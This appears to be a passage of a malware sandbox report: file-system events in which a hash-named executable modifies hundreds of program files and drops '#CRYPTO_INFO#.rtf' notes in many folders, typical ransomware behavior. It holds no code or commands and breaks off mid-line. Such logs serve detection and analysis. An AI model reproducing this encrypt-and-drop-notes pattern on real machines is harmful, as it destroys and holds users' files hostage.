8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\sample-thumb.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\acrobat_pdf.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb_new.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\servertool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management-agent.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\LICENSE 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\s_thumbnailview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-BoldIt.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\RequestStart.wma 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-114x114-precomposed.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInTray.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-57x57-precomposed.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_it_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_listview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sl_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\cstm_brand_preview2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\close.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\sRGB.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Acrobat_visual.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fi_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\LICENSE 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ru.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jvm.hprof.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\virgo-new-folder.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\file_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\unpack200.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\CompleteCheckmark.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\servertool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files 